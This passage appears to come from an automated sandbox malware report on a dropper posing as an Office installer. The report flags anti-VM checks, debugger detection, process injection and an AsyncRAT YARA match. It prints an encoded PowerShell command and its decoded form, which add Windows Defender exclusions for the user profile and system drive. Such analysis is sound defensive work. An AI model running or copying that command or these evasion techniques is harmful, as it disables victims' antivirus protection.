Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware\V
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual@\^q
Source: Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: VMware, Inc.1>0<
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: explorer9SbieDll.dll:select * from Win32_BIOS8Unexpected WMI query failure;version<SerialNumber>VMware|VIRTUAL|A M I|Xen?select * from Win32_ComputerSystem@manufacturerAmodelBMicrosoft|VMWare|VirtualCjohnDannaExxxxxxxx
Source: Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwareLR^qhf7
Source: Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: http://www.vmware.com/0
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: GOA8B XBTW58A4OC@\^q0VMware|VIRTUAL|A M I|Xen
Source: AppLaunch.exe, 0000000A.00000002.2944600925.0000000008ED8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW&"
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: mwlhZ mnyYT9VTA cbCLrcnk@\^q0Microsoft|VMWare|Virtual
Source: Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwareLR^q
Source: Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen@\^q
Source: powershell.exe, 00000008.00000002.2322745566.000002B46D71C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2944600925.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2944600925.0000000008ED8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWareLR^q
Source: Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: VMware, Inc.0
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwareLR^q$
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q 1:en-CH:Microsoft|VMWare|Virtual
Source: Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q 1:en-CH:VMware|VIRTUAL|A M I|Xen`
Source: Office Installer.exe, 00000004.00000002.2914496765.0000025350A18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q 1:en-CH:VMware|VIRTUAL|A M I|Xen
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process queried: DebugPort
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Code function: 0_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit, 0_2_004014D1
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Encrypted powershell cmdline option found
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: Base64 decoded <#avz#>Add-MpPreference <#btd#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#jqq#> -Force <#zsj#>
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: Base64 decoded <#avz#>Add-MpPreference <#btd#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#jqq#> -Force <#zsj#> Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA=" Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Users\user\AppData\Local\Vulvvmkewji.exe "C:\Users\user\AppData\Local\Vulvvmkewji.exe" Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Users\user\AppData\Local\Temp\Office Installer.exe "C:\Users\user\AppData\Local\Temp\Office Installer.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajageadgb6acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagiadabkacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagoacqbxacmapgagac0argbvahiaywblacaapaajahoacwbqacmapga="
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajageadgb6acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagiadabkacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagoacqbxacmapgagac0argbvahiaywblacaapaajahoacwbqacmapga=" Jump to behavior
Source: AppLaunch.exe, 0000000A.00000002.2920632986.0000000006951000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.000000000697F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.0000000006959000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@\^q
Source: AppLaunch.exe, 0000000A.00000002.2920632986.0000000006951000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.000000000697F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.0000000006959000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: Office install DVDabeW9-KDdabcdefg50cfadf4-6ad2-4bd2-9981-c7b5c05a8c67CW9b4e8K4-JK298-aTYR-CR4K7D-RJRePath7XX-KQBKV-4XQT-2NfCreate ISO: ace59gFlag Library not initialisedBK-26Shell_TrayWndiaria2sl-sisl-SIH4H-JH9380ed cdnbaseurl.16=http://officecdn.microsoft.com/pr/Office 2013 StandardVL KMS ClientBelizeOffScrubC2R.vbs ALL /NoCancel /OSE 2>&1 b= storeid= forceupgrade=True piniconstotaskbar=False FV7-KQX|VisioProRetail.16YRFb98-9Basque/t /f /IM IntegratedOffice.exe-nop -c "$Tls12 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072); [System.Net.ServicePointManager]::SecurityProtocol = $Tls12; (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData','proxy44174279bJ48RF-QFNorwegian-d68a-4Not joined to any domain or groupadd "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\OSM\preventedapplications" /v "visiosolution" /t REG_DWORD /d 1 /fWhen downloading the distribution, use one threadPC-RHGrooveVLHQW-9RHpOffice 2016-2024 C2R Licenses (s64Beta2_OneNoteVLMondoVolumexpiGJH-9CTY7WJ-YQM7-J9ac4StandardVLac6a45c5bfb-2d5CastilianProductReleaseId id=RGOffice\Data\branch.txtv1.142a74b.logfiles9ca-cd79-4add "HKCU\Software\Microsoft\Office\16.0\OSM" /v "EnableUpload" /t REG_DWORD /d 0 /f/i64MJVOffice 2019 Standard2019VL KMS Client AE-a53d-450cacscript.exe //NoLogoproductstoremove={GetModuleFileNameExWONENOTE.EXEWMR-QKG9HD-MQX|ProofingTools}Office 2019 Outlook2019VL KMS Client AEcompilers\pbcompiler.exe" P3-B64c7-11cTXY-MG2Office 2010 Beta2 Standard KMS ClientBB0d862user32.dll\Office Installer+.ini/Office/Data/99-DXOffice 2010 Beta1 Mondo KMS ClientYBJOffice 2016 WordVL KMS Client23bcBDRTWindowsLicensed[0-9]{2}\.[0-9]{1}\.[0-9]{4,5}\.[0-9]{4,5}_[0-9]{4}-[0-9]{2}-[0-9]{2}_[0-9]{2}\.[0-9]{2}\.[0-9]{2}rubc24\Office Installer.exeBFMJ-B6abcefg6c255DeleteVolumeMountPointA308-8cb4-828WG-BK4627BDP-RDY9d3BJYHM-V68",openBMc85da06187YC7#32770Oriyad8cBeta2_StandardVLd873EnglishWindows Vista mediatype.16=Local sourcetype.16=Local version.16=\o16files\c2rpridslicensefiles_auto.xml1c8-8YFY-9WPYM3-7J2EstonianLicenses\Program Files\Microsoft Office\root\Office16\BTOneNoteVolumeCWGC6CWHGX-PHRXR-B8KC8b75-bSetLayeredWindowAttributesPortugueseSHEmptyRecycleBinAAMD64MK4-8B7Finland5b1c609e3Microsoft_LTSC2024 update channel
Source: AppLaunch.exe, 0000000A.00000002.2920632986.0000000006951000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.000000000697F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.0000000006959000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@\^q%
Source: AppLaunch.exe, 0000000A.00000002.2920632986.0000000006951000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.000000000697F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.0000000006959000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Queries volume information: C:\Users\user\AppData\Local\Vulvvmkewji.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Queries volume information: C:\Users\user\AppData\Roaming\Lxfrfbi.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Queries volume information: C:\Users\user\AppData\Roaming\Lxfrfbi.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Code function: 4_2_00007FF6C7EE5890 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 4_2_00007FF6C7EE5890
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Yara detected AsyncRAT
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
